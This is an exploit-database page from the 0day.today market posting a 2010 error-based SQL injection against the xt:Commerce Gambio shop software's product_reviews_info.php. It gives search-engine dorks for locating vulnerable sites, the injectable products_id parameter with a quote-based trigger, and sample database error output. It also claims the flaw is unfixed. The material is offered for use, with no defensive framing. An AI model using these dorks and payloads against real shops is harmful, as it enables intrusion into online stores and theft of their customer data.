[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

xt:Commerce Gambio 2008-2010 ERROR Based (reviews.php) SQL Injection

Author
secret
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14107
Category
web applications
Date add
19-09-2010
Platform
php
======================================================================
xt:Commerce Gambio 2008 - 2010 ERROR Based (reviews.php) SQL Injection
======================================================================

# Exploit Title: xt:Commerce Gambio 2008 - 2010 ERROR Based SQL Injection "reviews.php"
# Date: 2010-09-18
# Author: secret
# Contact : secret_hf@hotmail.com / ICQ : 17-33-77
# Site : swissfaking.net/board
# Software Link: http://www.gambio.de/
# Version: 2006 - 2008 - 2010 - all versions
# Tested on: XP / Linux
 
# Fixed? : NOT FIXED
 
# Dorks : Gambio inurl:"reviews.php" / Gambio inurl:"product_reviews.php?products_id=" etc...
 
##############################################################################################
 
[ERROR BASED SQL INJECTION]
 
http://www.xxxxx.com/product_reviews_info.php?products_id=x[SQL INJECTION]
 
e.g. http://server/product_reviews_info.php?products_id=4[ERROR BASED SQL INECTION]
e.g. http://server/product_reviews_info.php?products_id=4'
 
->   xtc_db_error ("select manufacturers_id from products where products_id = 4/'", "1064
 
##############################################################################################
 
[THANKS TO]
 
ALLAH - الله لا إله لا ايل
 
To all my brothers & sisters in IRAN - god bless you - support the GREEN REVOLUTION        



#  0day.today [2024-12-25]  #